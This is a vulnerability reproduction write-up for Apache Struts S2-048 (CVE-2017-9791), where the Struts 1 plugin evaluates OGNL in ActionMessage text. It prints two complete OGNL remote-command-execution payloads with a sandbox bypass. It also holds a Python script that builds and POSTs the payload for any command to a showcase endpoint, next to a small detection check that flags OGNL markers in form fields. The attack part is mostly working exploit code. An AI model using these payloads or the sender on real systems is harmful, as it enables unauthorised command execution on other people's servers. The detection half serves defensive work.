023-(CVE-2017-9791)s2-048.md
1.78 KB / 2021-07-17 00:01:26
# (CVE-2017-9791)s2-048
## 1. Vulnerability overview
When the Struts 1 plugin (struts2-struts1-plugin) is used with a Struts 1 action and an untrusted request value is passed straight into the ActionMessage class (as the message text rather than as a resource key with the value as an argument), that value is evaluated as an OGNL expression, which leads to command execution on the server.
## 2. Affected versions
Struts 2.3.x, when the Struts 1 plugin is in use together with a Struts 1 action.
## 3. Reproduction
## POC
![1.png](images/4dd1c2e7539c43ee8d37e710cbc54c35.png)
![2.png](images/237c6c9d04cc4743ae845f0228764df7.png)
**Output echoed inside the normal page**
```java
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}
```
![3.png](images/bdaa75d563164093b75e1507a0bfd8a6.png)
Modify the request in Burp; typing the payload into the browser form just returns a 500.
**Only the command output is returned**
```java
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
```
![4.png](images/4d0082833dbd4b41abfd2d06fc8ec50e.png)
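The following script is an added example, not the writeup author's tooling: it builds the second payload above (sandbox bypass plus ProcessBuilder with the output copied straight into the response stream) for an arbitrary command, wraps it in the form the usual reproduction target submits, and also shows the inverse, a small request-body check a WAF or log-review rule could use to flag the bypass prefix. It assumes the target is the struts2-showcase application, whose Struts 1 integration example copies the `name` field of `/integration/saveGangster.action` into an ActionMessage; the endpoint and the other field names are assumptions that must be adjusted for any other application.

```python
"""S2-048 (CVE-2017-9791) helper: payload builder, sender and a detection check.

Added example. Assumptions (not from the writeup): the showcase endpoint
/integration/saveGangster.action and its form fields name, age,
__checkbox_bustedBefore and description; only `name` reaches ActionMessage.
"""
import re
import sys
import urllib.parse
import urllib.request

# Same sandbox bypass as both payloads on this page: reuse DEFAULT_MEMBER_ACCESS
# when #_memberAccess is writable; otherwise empty OgnlUtil's excluded package and
# class lists and install the permissive MemberAccess through the context.
_BYPASS = (
    "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    "(#_memberAccess?(#_memberAccess=#dm):("
    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    "(#ognlUtil.getExcludedPackageNames().clear())."
    "(#ognlUtil.getExcludedClasses().clear())."
    "(#context.setMemberAccess(#dm))))"
)

# Assumed showcase form (see module docstring).
SHOWCASE_PATH = "/integration/saveGangster.action"


def build_payload(cmd: str) -> str:
    """OGNL that runs `cmd` via ProcessBuilder and copies its output into the response."""
    quoted = cmd.replace("'", "\\'")  # OGNL string literals take Java-style escapes
    return (
        "%{" + _BYPASS + "."
        f"(#cmd='{quoted}')."
        "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        "(#p=new java.lang.ProcessBuilder(#cmds))."
        "(#p.redirectErrorStream(true))."
        "(#process=#p.start())."
        "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        "(#ros.flush())}"
    )


def build_form(cmd: str) -> bytes:
    """URL-encoded body of the assumed showcase form with the payload in `name`."""
    fields = {
        "name": build_payload(cmd),
        "age": "20",
        "__checkbox_bustedBefore": "true",
        "description": "",
    }
    return urllib.parse.urlencode(fields).encode()


def run(base_url: str, cmd: str, timeout: float = 10.0) -> str:
    """POST the payload; the command output is written before anything the framework renders."""
    req = urllib.request.Request(
        base_url.rstrip("/") + SHOWCASE_PATH,
        data=build_form(cmd),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Detection side: markers that every variant of this bypass carries. Scanning the
# decoded field values (not the raw body) defeats simple URL-encoding evasion.
_MARKERS = (
    "#_memberAccess",
    "DEFAULT_MEMBER_ACCESS",
    "@ognl.OgnlContext@",
    "OgnlUtil@class",
    "java.lang.ProcessBuilder",
    "getRuntime().exec",
)


def flag_ognl(form_body: str) -> list:
    """Return the names of form fields whose decoded value looks like an OGNL expression."""
    hits = []
    for field, values in urllib.parse.parse_qs(form_body, keep_blank_values=True).items():
        for value in values:
            if re.search(r"[%$]\{.*\}", value, re.S) or any(m in value for m in _MARKERS):
                hits.append(field)
                break
    return hits


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://host:8080/struts2-showcase 'id'")
    print(run(sys.argv[1], sys.argv[2]))
```

The payload is sent as a normal form POST, which is what the Burp step above does by hand; the browser form fails because the raw `%{...}` submission is not what the page's own form handling expects, so the request has to be edited on the wire. `flag_ognl` is deliberately conservative: it only reports fields that contain an expression delimiter or one of the bypass identifiers, so ordinary names such as "John" are not flagged.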